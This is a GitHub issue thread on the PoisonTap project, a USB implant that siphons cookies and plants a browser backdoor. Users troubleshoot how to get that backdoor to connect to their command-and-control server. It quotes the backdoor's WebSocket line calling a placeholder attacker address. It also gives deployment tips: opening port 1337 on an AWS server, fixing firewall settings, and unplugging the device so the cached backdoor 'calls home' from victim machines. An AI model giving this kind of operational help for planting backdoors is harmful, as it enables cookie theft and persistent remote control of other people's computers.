### ISSUE TITLE
Unable to communicate via WebSocket

### ISSUE THREAD

**Issue by f3d0x0** [samyk/poisontap#76]
Hi all,
I just configured my poisontap and I've got some problems with the connection to my C&C server via WebSocket (the Cookie Siphoning is currently working for me).
I setup an Ubuntu Server machine on AWS Cloud for the testing purpose, installed NodeJs (version 6.9.2) and start the backend_server.js without errors:
![nodejs_started_ink_li](https://cloud.githubusercontent.com/assets/6794063/21227185/19a771d0-c2d9-11e6-8c8a-9264e5ea3b63.jpg)

In the victim machine (after plugged the poisontap) I invoke the WebSocket, for example, typing in the browser "google.com/PoisonTap" but I can't see any upcoming connection on my C&C server. 
If a inspect the code on the victim browser, I saw that the backdoor is fully loaded but I've got an error on the line 7 of "backdoor.html":
 **var socket = new WebSocket('ws://MY_PUBLIC_IP_SERVER:1337')** 
The exception raised is the following:
**WebSocket connection to 'ws://MY_PUBLIC_IP_SERVER:1337/' failed: Connection closed before receiving a handshake response**.

You guys have any suggestion?
Thanks in advance and **kudos to Samy for this amazing work**!

**Comment by Leyart** [comment]
Change the "MY_PUBLIC_IP_SERVER" with the IP of your AWS Cloud

**Comment by f3d0x0** [comment]
Of course there is the AWS IP address there.
I personally put that string just for not sharing the address with everyone. :)

**Comment by Leyart** [comment]
Have you opened the 1337 diorami in the was instance with iptables? Are you sure that the poisontap configuration is not preventing your internet connection to work properly?

**Comment by f3d0x0** [comment]
Thanks @Lucg for the answer, but it works. I messed up with with some firewalling configuration in AWS. 
The PoisonTap backdoor is now "calling home" when it's plugged. 👍

**Comment by F4l13n5n0w** [comment]
Hi @fEDUntu , 
I got the same problem with you, but the difference is that after poisonTap been plugged in, I lost the Internet access but everything works fine (animation shows up, backdoor.html can be injected correctly, only issue is the victim could not communicate to my C&C server), wondering how do you configure your poisonTap to make it have Internet access ability ?
Thanks,

**Comment by f3d0x0** [comment]
Hi @F4l13n5n0w,
in this moment I'm not able to check the infrastructure I'd set up for PoisonTap. 
Have you try to check the Internet connection on the victim machine **after** unplug the PoisonTap device?
If I remember correctly, during the infection all the internet traffic didn't go outsite but it was all "catched and replaced" by PoisonTap, but when I plugged it off (after saw the animation and undestrood that the infection was done) **I was able to connect to the Internet**.
Have you already check in this way?
Let me know.

**Comment by F4l13n5n0w** [comment]
@fEDUntu 
All good now! Thanks very much! The fix is just unplug the PoisonTap to get the Internet access back and the cached backdoor will work straight away. so actually, it's now "calling home" when it's unplugged. LOL

p.s. Great job! @samyk

**Comment by f3d0x0** [comment]
@F4l13n5n0w Great! It's always a pleasure when you can call back home! ;)

**Comment by samyk** [comment]
Awesome! Can we close this?

**Comment by f3d0x0** [comment]
@samyk Yes sir!
